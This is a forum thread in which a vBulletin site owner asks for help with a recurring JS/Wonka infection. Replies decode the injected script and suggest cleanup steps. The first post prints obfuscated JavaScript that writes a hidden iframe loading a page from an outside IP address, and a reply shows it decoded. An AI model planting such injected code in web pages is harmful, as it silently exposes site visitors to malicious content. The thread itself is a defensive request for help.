The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
||||
|
||||
JS/Wonka infection
JS/Wonka have been detected on my site and infected some of my files like index.php, global.php, showthread.php etc
Recenty the file alteration have stopped, but it keeps adding itself into my footer template and I have to manually remove it several times a day/week and I have no idea how to remove it. http://www.systemsmanagementpipeline.com/news/172302797 This is how it looks Code:
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%36%2E%32%33%35%2E%32%32%31%2E%31%32%33%2F%7E%65%6C%69%74%65%2D%6F%6E%2F%70%75%62%2F%6C%69%62%2F%64%6F%6D%54%54%2F%6E%65%77%73%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </Script> Thanks |
#2
|
|||
|
|||
your directories are all CHMOD 0777, or this javascript would not be able to affect any file you have...
the only place you need to have chmod your files is in the cache directory... if you have one. oh, btw.. this forum is for vbulletin related questions... yours is about javascript... there is another forum just below, where more answers can be found... |
#3
|
||||
|
||||
Thank you! All my folders are allready CHMOD 755 and files are 644
Perhaps a mod could move it to the forum below? |
#4
|
||||
|
||||
download all files and do a batch FIND for said script and remove it ... once completed upload clean files
here's the obfuscated code decoded... HTML Code:
<Script Language='Javascript'> <!-- document.write(unescape('<iframe src="http://66.235.221.123/~elite-on/pub/lib/domTT/news.html" width=0 height=0 style="display: none"></iframe>')); //--> </Script> |
#5
|
|||
|
|||
Depending on how you got this infection, many more files on your server could be infected. I suggest you ask your host for help in checking your server.
|
#6
|
|||
|
|||
news coming from here:
HTML Code:
http://elite-online-gaming.com/ Anyway...here's a good article on this: http://www.websensesecuritylabs.com/...ysis_oct05.pdf |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|